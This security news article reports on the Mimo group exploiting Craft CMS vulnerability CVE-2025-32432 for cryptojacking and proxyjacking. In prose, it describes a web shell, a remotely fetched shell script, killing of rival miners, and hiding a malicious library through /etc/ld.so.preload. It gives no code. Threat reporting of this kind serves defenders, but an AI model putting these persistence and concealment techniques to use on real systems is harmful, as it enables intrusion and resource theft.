Do Son 
A recent vulnerability, CVE-2025-32432, discovered in the widely used content management system Craft CMS, has swiftly become a new weapon in the arsenal of the cybercriminal group known as Mimo—a financially motivated and well-established threat actor. Shortly after the flaw was disclosed in February 2025, experts at Orange Cyberdefense SensePost observed its active exploitation. However, the vulnerability was only addressed in the most recent Craft CMS updates—versions 3.9.15, 4.14.15, and 5.6.17.
According to a new report by Sekoia, the Mimo group wasted no time incorporating CVE-2025-32432 into their operational toolkit. Once unauthorized access to a target system is achieved, attackers deploy a web shell to establish persistence and remote control. Through this shell, they download and execute a shell script named 4l4md4r.sh, fetched from a remote server via curl, wget, or even through the urllib2 library—ironically renamed “fbi” by the attackers, a mocking nod that serves as an additional indicator during Python-based malware analysis.
The script begins by scanning for evidence of prior infections and cleanses the system of rival cryptominers, including XMRig. Once the system is purged of competing processes, the second phase of the attack commences: the ELF binary 4l4md4r—also known as the Mimo Loader—is downloaded and launched. Its purpose is to modify the system file /etc/ld.so.preload to conceal the primary malicious extension, alamdar.so, thereby evading detection.
Once entrenched in the system, the Mimo Loader prepares the ground for the deployment of two monetization tools: the XMRig cryptominer and the IPRoyal proxy service. This dual payload enables parallel profit streams: harnessing the victim’s computing power to mine cryptocurrency and leasing the compromised network bandwidth for anonymous—and often illicit—activities. These techniques are known as cryptojacking and proxyjacking, respectively.
Active since at least March 2022, the Mimo group has been repeatedly mentioned in technical analyses for exploiting known vulnerabilities in high-profile systems, including Apache Log4j (CVE-2021-44228), Atlassian Confluence (CVE-2022-26134), PaperCut (CVE-2023-27350), and Apache ActiveMQ (CVE-2023-46604). In 2023, the group was also linked to ransomware activity involving MauriCrypt, a fork known by the alias Mimus.
Sekoia’s findings indicate that most of the attack chains originate from Turkish IP addresses, consistent with earlier intelligence regarding the group’s likely geographic base. The speed of their operation was striking: mere days separated the vulnerability’s disclosure, the emergence of a working proof-of-concept, and its deployment at scale—underscoring the group’s high technical agility.
The operators behind Mimo remain vigilant, swiftly incorporating newly exposed flaws into their toolkit. As major CMS platforms race to patch critical vulnerabilities, one can only speculate which product will next fall prey to this group, which continues to profit deftly from compromised systems—by mining value both in processing power and connectivity.
Donate